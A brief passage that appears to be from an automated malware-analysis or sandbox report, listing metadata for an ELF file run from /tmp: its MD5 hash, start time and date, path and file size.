                MD5 hash:f90025024613f3a9d54373f3cc68eefd

                General

                Start time:16:35:52
                Start date:20/03/2023
                Path:/tmp/XHZFo8hExw.elf
                Arguments:n/a
                File size:58448 bytes
                MD5 hash:f90025024613f3a9d54373f3cc68eefd